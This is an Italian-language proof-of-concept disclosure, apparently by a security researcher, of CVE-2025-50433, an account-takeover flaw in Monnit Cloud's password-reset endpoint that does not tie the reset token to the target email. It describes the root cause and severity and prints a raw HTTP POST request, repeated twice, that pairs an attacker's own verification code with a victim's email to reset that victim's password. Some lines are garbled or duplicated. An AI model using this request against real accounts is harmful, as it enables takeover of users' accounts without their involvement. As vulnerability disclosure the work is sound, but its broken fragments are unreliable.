
Prova di concetto per un'acquisizione critica dell'account Monnit Cloud (CVE-2025-50433), che sfrutta la mancata validazione token-email nel reset della password e fornisce passaggi di attacco, causa principale e rimedio.
Esiste una vulnerabilità critica di autenticazione su *.imonnit.com
che permette il completo Account Takeover (ATO) su qualsiasi account utente senza
interazione della vittima.
Il backend non riesce a convalidare l'associazione tra il token di reset della password e l'email target, consentendo agli aggressori di utilizzare il proprio token di reset valido per reimpostare la password di qualsiasi account vittima.
[email protected]).[email protected]). POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (Critica)
Vettore: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
L'endpoint di reset della password non convalida che il token di reset appartenga alla stessa email fornita durante l'operazione di reset, consentendo il reset arbitrario delle password utilizzando token controllati dall'aggressore.
/Account/PasswordReset/
Vendor: Monnit Corporation
Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor